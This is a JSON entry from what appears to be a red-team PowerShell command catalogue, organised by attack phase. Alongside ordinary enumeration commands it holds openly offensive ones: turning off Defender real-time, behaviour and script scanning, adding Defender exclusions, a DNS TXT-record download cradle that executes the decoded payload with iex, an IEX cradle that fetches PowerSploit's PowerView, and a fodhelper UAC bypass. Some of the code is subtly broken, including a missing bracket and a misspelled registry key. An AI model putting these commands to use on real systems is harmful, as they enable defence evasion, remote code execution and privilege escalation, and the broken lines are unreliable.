Closed Patrick-DE closed 4 days ago
{
  "name": "PowerShell",
  "phases": [
    "01. Initial Access",
    "03. Host Enumeration",
    "04. Persistence",
    "05. Privilege Escalation",
    "07. Lateral Movement"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [ "Windows" ],
  "source": "https://learn.microsoft.com/de-de/powershell/?view=powershell-7.3",
  "description": "PowerShell",
  "undetected": [],
  "detected": [],
  "content": "\n\n## [[LSA Protection]]\n`Get-WinEvent -FilterHashtable @{ LogName='system'; Id='12' ; ProviderName='Microsoft-Windows-Wininit' }`\n\n## [[RDP]]\n`Get-WinEvent -FilterHashtable @{ LogName='Microsoft-Windows-TerminalServices-RDPClient/Operational'; id='1024' } | select timecreated, message | ft -AutoSize -Wrap`\n\n## [[COM Hijacking]]\nList COM objects\n`gwmi Win32_COMSetting | ? {$_.progid } | sort | ft ProgId,Caption,InprocServer32`\n\nList COM Object Methods for WScript.Shell.1\n`$o = [activator]::CreateInstance([type]::GetTypeFromProgID((\"WScript.Shell.1\"))) | gm`\n\n## [[Unquoted Service Path]]\nGet ACLs of services\n```ps\npowershell Get-Acl -Path \"C:\\Program Files\\Vuln Services\" | fl\n \nPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Program Files\\Vuln Services\nOwner : BUILTIN\\Administrators\nGroup : wkstn1\\None\nAccess : CREATOR OWNER Allow FullControl\n NT AUTHORITY\\SYSTEM Allow FullControl\n BUILTIN\\Administrators Allow FullControl\n BUILTIN\\Users Allow Write, ReadAndExecute, Synchronize\n NT SERVICE\\TrustedInstaller Allow FullControl\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize\n```\n\n## [[Common Language Runtime (CLR) Versions]]\n```ps\ncmd.exe /c dir %WINDIR%\\Microsoft.Net\\Framework\\ /s /b | find \"System.dll\"\n\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v2.0.50727\\System.dll\")\n\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v4.0.30319\\System.dll\")\n```\n\n",
  "commands": [
    {
      "id": "6183749c-eee5-42ca-a171-ac1b1a35a449",
      "name": "Check LSA Protection",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-WinEvent -FilterHashtable @{ LogName='system'; Id='12' ; ProviderName='Microsoft-Windows-Wininit' }"
    },
    {
      "id": "a7a1f9d8-ead2-4ef3-a773-1bda67790647",
      "name": "Decode Base64",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($str))"
    },
    {
      "id": "a8516fd7-ce4f-4c19-97c9-780aa299f594",
      "name": "Disable Defender",
      "description": "",
      "tag": "",
      "results": [],
      "references": [ "https://github.com/evilmog/evilmog/wiki/DNS-Download-Cradle" ],
      "cmd": "Set-MpPreference -DisableRealtimeMonitoring $true\nSet-MpPreference -DisableBehaviorMonitoring $true\nSet-MpPreference -DisableScriptScanning $true\nSet-MpPreference -DisableArchiveScanning $true",
      "requirements": { "tag": "PRIVS:ADMIN" }
    },
    {
      "id": "3949f2c6-7e9a-4b65-91c4-657ef1766dce",
      "name": "Download cradle via TXT DNS records",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "$a='';$n=1..2;ForEach ($i in $n) { $a += ((resolve-dnsname -type txt $mydomain.org).strings) }; iex((System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a))))"
    },
    {
      "id": "d246dc40-5194-4f1e-a4ca-208827e49e36",
      "name": "Encode Base64",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))"
    },
    {
      "id": "48b78655-db1f-4da0-9d31-f90cc810eb3e",
      "name": "Get ACLs of services",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "powershell Get-Acl -Path \"C:\\Program Files\\Vuln Services\" | fl"
    },
    {
      "id": "bf3b2a29-c697-4835-aadd-02cf9a14dcbc",
      "name": "Get all COM objects via wmi",
      "description": "A lot of output",
      "tag": "",
      "results": [],
      "cmd": "gwmi Win32_COMSetting | ? {$_.progid } | sort | ft ProgId,Caption,InprocServer32"
    },
    {
      "id": "5c9766c7-293d-4110-bfeb-0aabfd061080",
      "name": "Get CLR versions",
      "description": "Get Common Language Runtime (CLR) versions",
      "tag": "",
      "results": [],
      "cmd": "cmd.exe /c dir %WINDIR%\\Microsoft.Net\\Framework\\ /s /b | find \"System.dll\"\n\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v2.0.50727\\System.dll\")\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v4.0.30319\\System.dll\")"
    },
    {
      "id": "52121667-91db-4042-910a-ae02121b82f3",
      "name": "Get Defender Detections",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-MpThreatDetection"
    },
    {
      "id": "c6a72c8f-0734-4a95-9dfd-241ac41591b5",
      "name": "Get Defender Exclusions",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-MpPreference | Select-Object -ExpandProperty ExclusionPath",
      "requirements": { "tag": "PRIVS:ADMIN" }
    },
    {
      "id": "4e5c3ef8-0775-4d8e-af57-a82dc066e524",
      "name": "Get Defender Status",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-MpComputerStatus\nGet-MpPreference"
    },
    {
      "id": "3c5b88d5-05d2-43bd-912a-d7025e4751f0",
      "name": "Get Imported Modules",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-Module -All"
    },
    {
      "id": "94a5526d-cdc0-47e9-afd7-a14881beffe1",
      "name": "Get latest MDE Detection",
      "description": "Newest detection first; the previous form sorted on $_ outside a script block, which sorts on nothing",
      "tag": "",
      "results": [],
      "cmd": "Get-MpThreatDetection | Sort-Object InitialDetectionTime -Descending | Select-Object -First 1"
    },
    {
      "id": "e6685b82-4fa3-4591-bc80-732a64a8cc28",
      "name": "Get methods of COM object",
      "description": "List COM Object Methods for WScript.Shell.1",
      "tag": "",
      "results": [],
      "cmd": "[activator]::CreateInstance([type]::GetTypeFromProgID((\"WScript.Shell.1\"))) | gm"
    },
    {
      "id": "36c7d31c-865d-4e71-83fe-cd41b3560f42",
      "name": "Get MSSQL Servers",
      "description": "Searches the forest global catalog for accounts with a SQL service principal name",
      "tag": "",
      "results": [],
      "cmd": "$ADForestInfoRootDomain = ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).RootDomain\n$ADForestInfoRootDomainDN = \"DC=\" + $ADForestInfoRootDomain -Replace(\"\\.\",',DC=')\n$ADDomainInfoLGCDN = 'GC://' + $ADForestInfoRootDomainDN\n$root = [ADSI]$ADDomainInfoLGCDN\n$ADSPNSearcher = new-Object System.DirectoryServices.DirectorySearcher($root,\"(serviceprincipalname=*sql*)\")\n$ADSPNSearcher.PageSize = 500\n$AllADSQLServerSPNs = $ADSPNSearcher.FindAll()"
    },
    {
      "id": "cc43d2fa-b951-4f09-b37f-91f34ea5bbaf",
      "name": "Get RDP Events",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-WinEvent -FilterHashtable @{ LogName='Microsoft-Windows-TerminalServices-RDPClient/Operational'; id='1024' } | select timecreated, message | ft -AutoSize -Wrap"
    },
    {
      "id": "cfdc1559-6498-40c2-8bbe-e200e7a47ec1",
      "name": "Get Registry Entry",
      "description": "With the example of AppLocker and WDAC",
      "tag": "",
      "results": [],
      "cmd": "#APPLOCKER\nGet-ChildItem -Path 'HKLM:\\Software\\Policies\\Microsoft\\Windows\\SRPV2'\nGet-ChildItem -Path 'HKLM:\\System\\CurrentControlSet\\Control\\SRP\\GP'\n#WDAC\nGet-ItemProperty -Path 'HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeviceGuard' -Name DeployConfigCIPolicy\nGet-ItemProperty -Path 'HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeviceGuard' -Name ConfigCIPolicyFilePath"
    },
    {
      "id": "7dc8490f-8454-4d39-83d5-43bcda1bc27c",
      "name": "Launch C# via PowerShell",
      "description": "Add-Type must run after $code is defined; the random suffix avoids a duplicate type name on repeated runs",
      "tag": "",
      "results": [],
      "cmd": "$id = get-random\n$assemblies = (\"System.Core\",\"System.Xml.Linq\",\"System.Data\",\"System.Xml\", \"System.Data.DataSetExtensions\", \"Microsoft.CSharp\")\n$code = @\"\nusing System;\nnamespace HelloWorld\n{\n\tpublic class Program$id\n\t{\n\t\tpublic static void Main(){\n\t\t\tConsole.WriteLine(\"Hello world!\");\n\t\t}\n\t}\n}\n\"@\n\nAdd-Type -ReferencedAssemblies $assemblies -TypeDefinition $code -Language CSharp\niex \"[HelloWorld.Program$id]::Main()\""
    },
    {
      "id": "7e1ff5f3-6e68-405c-81b5-64bba180e491",
      "name": "Load Github Script Remotely",
      "description": "Shown with an example of PowerView",
      "tag": "",
      "results": [],
      "cmd": "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Find-GPOLocation -UserName Administrator;"
    },
    {
      "id": "91dc7ca7-51e5-414f-a6c7-37094cfa60e5",
      "name": "PS-Remoting",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Invoke-Command -ComputerName Test1-Win2k16 -ScriptBlock{Get-LocalGroupMember -Name 'Administrators'}",
      "requirements": { "tag": "SERVICE:WINRM" }
    },
    {
      "id": "eb9dc6fa-f509-41ab-ab5c-33653b431bc4",
      "name": "Set Defender Exclusions",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Set-MpPreference -ExclusionPath PATH\\TO\\FOLDER\nSet-MpPreference -ExclusionExtension docx\nSet-MpPreference -ExclusionProcess Process",
      "requirements": { "tag": "PRIVS:ADMIN" }
    },
    {
      "id": "0b63dd81-e89a-4934-b625-4ab767e81149",
      "name": "Trigger WSUS",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "$updateSession = New-Object -com \"Microsoft.Update.Session\"; $updates=$updateSession.CreateupdateSearcher().Search($criteria).Updates; wuauclt.exe /reportnow"
    },
    {
      "id": "a95c3c48-e767-4086-83b8-aac0e7883300",
      "name": "Exploit Fodhelper",
      "description": "",
      "tag": "",
      "results": [ "EXPLOITS:FODHELPER" ],
      "cmd": "New-Item -Path HKCU:\\Software\\Classes\\mssettings\\shell\\open\\command -Value powershell.exe –Force\nNew-ItemProperty -Path HKCU:\\Software\\Classes\\mssettings\\shell\\open\\command -Name DelegateExecute -PropertyType String -Force\nC:\\Windows\\System32\\fodhelper.exe"
    }
  ]
}